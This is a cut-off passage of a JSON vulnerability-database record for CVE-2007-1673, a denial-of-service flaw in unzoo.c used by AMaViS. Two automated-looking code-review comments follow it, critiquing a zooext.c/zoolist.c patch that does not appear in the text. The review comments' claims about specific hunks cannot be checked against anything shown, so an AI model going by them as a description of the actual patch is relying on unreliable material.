"23823" }, { "date": "2012-06-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "date": "2018-10-16T16:40:28.443000", "db": "NVD", "id": "CVE-2007-1673" }, { "date": "2007-05-10T00:00:00", "db": "CNNVD", "id": "CNNVD-200705-118" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-200705-118" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "AMaViS Of multiple products used in unzoo.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2007-001745" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-200705-118" } ], "trust": 0.6 } }
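Review bot: in the zooext.c hunk at loop_again (@@ -597,6 +601,12), and in the matching zoolist.c hunk before the final zooseek (@@ -437,6 +441,11), the unbraced `if (next_ptr <= zoo_pointer) prterror ('f', ...)` is followed unconditionally by `zoo_pointer = next_ptr;` and the seek. The fix therefore only holds if prterror called with 'f' never returns, and nothing in the visible lines shows that. I would brace the check and leave the loop explicitly after reporting the error, so that a backward or self-referencing next offset can never reach zooseek. The types of next_ptr and direntry.next are also not visible here; if either is signed, the comparison against the unsigned long zoo_pointer deserves an explicit check for negative values first.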
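Review bot: the declaration hunks in both files (zooext.c @@ -89,6 +89,7 and zoolist.c @@ -92,6 +92,7) were line-wrapped in transit. The comment on the added `unsigned long zoo_pointer = 0;` line continues on a following line that has no `+` prefix, and several context lines (for example the `first_dir` declarations and the `zooseek (zoo_file, zoo_header.zoo_start, 0);` line) are split the same way, so the patch is unlikely to apply as posted. Shortening the comment so the added line fits on one line, and reposting the diff unwrapped or as an attachment, would fix this.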